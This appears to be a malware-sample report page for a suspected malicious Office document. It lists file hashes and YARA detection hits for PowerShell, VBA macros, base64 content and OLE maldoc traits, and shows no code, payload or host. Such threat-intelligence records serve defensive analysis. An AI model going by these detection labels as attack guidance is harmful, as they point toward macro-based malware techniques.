Sample details: 4f781bd8469b6e5f337dca97e4dc3d41

Hashes
MD5: 4f781bd8469b6e5f337dca97e4dc3d41
SHA1: 8e4963d3cdc63e4fa13ad6dc39c92b2e1171f67c
SHA256: ea7d53b1b0c0425871b2cad02ea8242e849f07fcda6f989752476283c595e57e
SSDEEP: 768:DXirRkVucRFoqkp59YBvLdTv9ReVi4eFov5UHRFBt+1o94GYLerHihX51CLW:j4Rkocn1kp59gxBK85fBt+a9tpTiLI
Details
File Type: Composite
Yara Hits
YRP/powershell | YRP/office_document_vba | YRP/Contains_VBA_macro_code | YRP/domain | YRP/url | YRP/contentis_base64 | YRP/maldoc_OLE_file_magic_number | YRP/Misc_Suspicious_Strings | FlorianRoth/PowerShell_Case_Anomaly
Source
Strings